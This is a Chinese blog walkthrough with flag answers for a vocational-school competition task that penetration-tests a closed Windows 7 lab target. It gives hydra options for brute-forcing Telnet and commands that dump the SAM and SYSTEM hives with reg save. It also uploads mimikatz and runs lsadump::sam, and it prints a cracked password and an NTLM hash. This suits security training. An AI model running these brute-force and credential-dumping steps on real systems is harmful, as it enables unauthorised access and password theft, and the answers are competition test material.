首页 > 系统相关 >网络安全(中职组)-B模块:Windows操作系统渗透测试

网络安全(中职组)-B模块:Windows操作系统渗透测试

时间:2023-03-06 13:23:58浏览次数:51  
标签:网络安全 场景 Windows 中职 渗透 FLAG 测试 服务器

任务环境说明:

服务器场景:teltest

服务器场景操作系统:Windows7 (封闭靶机)

1.通过本地PC中渗透测试平台Kali对服务器场景Windows进行系统服务及版本扫描渗透测试,并将该

作显示结果中Telnet服务对应的端口号作为FLAG提交;

思路:nmap扫,如果扫了之后不好判断就打进去,查看进程

 

 此时看到telnet的进程时1988

cmd中netstat -ano查看端口后对应的进程

 

 232端口就是telnet的端口号

FLAG:232

 

2.通过本地PC中渗透测试平台Kali对服务器场景Windows进行渗透测试,使用kali中hydra对服务器Telnet服务进行暴力破解(用户名为teltest),将hydra使用的必要参数当做FLAG进行提交(例:nmap -s -p 22);(字典路径/usr/share/wordlists/dirb/small.txt)

FLAG:hydra -l -P -s 232

 

3.通过本地PC中渗透测试平台Kali对服务器场景Windows进行渗透测试,使用kali中hydra对服务器Telnet服务进行暴力破解(用户名为teltest),将破解成功的密码当做FLAG进行提交;(字典路径/usr/share/wordlists/dirb/small.txt)

FLAG:customers

4.通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,取得的账户密码有远程桌面权限,将该场景系统中sam文件使用reg相关命令提取,将完整命令作为FLAG提交;

FLAG:reg save HKLM\SAM sam.hive

5.通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,取得的账户密码有远程桌面权限,将该场景系统中system文件使用reg相关命令提取,将完整命令作为FLAG提交;

FLAG:reg save HKLM\SYSTEM system.hive

6.通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,将sam文件与system文件提取到本地,使用桌面mimikatz工具提取teltest密码信息,将提取信息的命令作为FLAG提交;

思路:如果桌面上有就直接用,没有利用ms17上传一下

meterpreter > upload /usr/share/windows-resources/mimikatz/x64 C:\/

靶机打开cmd,c盘根目录下,找到mimikatz.exe

c:\>mimikatz.exe  #使用该工具

mimikatz # lasdump::sam

FLAG:lsadump::sam

 

7.通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,将sam文件与system文件提取到本地,使用桌面mimikatz工具提取administrators密码信息,将提取到的hash值作为FLAG提交;

FLAG:6cfa9ce05f0afaa483beaea6567ea26e

标签:网络安全,场景,Windows,中职,渗透,FLAG,测试,服务器
From: https://www.cnblogs.com/mingchaobinghongcha/p/17183492.html

相关文章

  • Windows Torch 安装
    首先,电脑要有显卡(没有显卡建议查cpu版本Torch安装和使用)一、基础装备(一)、Pycharm下载地址:DownloadPyCharm:PythonIDEforProfessionalDevelopersbyJetBrains......
  • Windows server 2008 R2 无法启用网络发现
    问题描述:就算在高级共享设置中启用网络发现并保存修改也会变回关闭网络发现解决方法:打开服务设置(win+R在运行栏里输入services.msc),开启以下三个服务FunctionDisco......
  • windows server 2008 R2虚拟机安装问题
    安装流程安装主要有两种方式:1.自定义安装2.自动安装自定义安装选择稍后安装操作系统,同时CD/DVD选择想要安装的镜像​ 满足需要自定义需求的安装流程自动安......
  • Windows环境下go项目无法执行wire命令
    原因是,路径有问题。需要手动的指定路径。$ROOT_DIR=e/workProject/cloud-base/src/talon/appmakewirewire:generatefailedmake:***[Makefile:17:wire]Error1......
  • [黄河流域公安院校网络安全技能挑战赛]Babyre RE
    查壳一下,64位ELF文件带UPX壳轻车熟路脱壳,啪的一下很快啊,就脱壳失败了给我整不会了,尝试用IDA远程调试手动脱壳也没成功陷入僵局之时,通过查询知道可能是修改了UPX!特......
  • Windows聚焦不更新怎么办
    Windows聚焦不更新?Windows11系统的Windows聚焦不更新了怎么解决?聚焦锁屏图片不更换怎么办?方法一:Step1按下键盘上的Win+S组合键,或单击任务栏上的搜索图标,打开Windows......
  • Windows 远程连接相关问题。
    Windows远程桌面连接时报错“你的凭据不工作”目标电脑:开始-运行-secpol.msc,展开安全设计-本地策略-安全选项,修改网络访问:本地帐户的共享和安全模型为......
  • C语言学习笔记之 第四讲:C语言Windows命令行编程
    1、stdlib头文件即standardlibrary标准库头文件。stdlib头文件里包含了C、C++语言的最常用的​​系统函数​​该文件包含了C语言标准​​库函数​​的定义2、system()......
  • Windows 11 右键菜单恢复Windows 10 样式(Win11右键菜单恢复)
    右键菜单改回Win10(展开)1.新建文件:win11右键展开.bat2.填写脚本内容regadd"HKCU\Software\Classes\CLSID\{86ca1aa0-34aa-4e8b-a509-50c905bae2a2}\InprocServer32......
  • Windows设置暂停更新天数为2000年
    新建bat文件,内容如下regadd"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsUpdate\UX\Settings"/vFlightSettingsMaxPauseDays/treg_dword/d730000/fpause......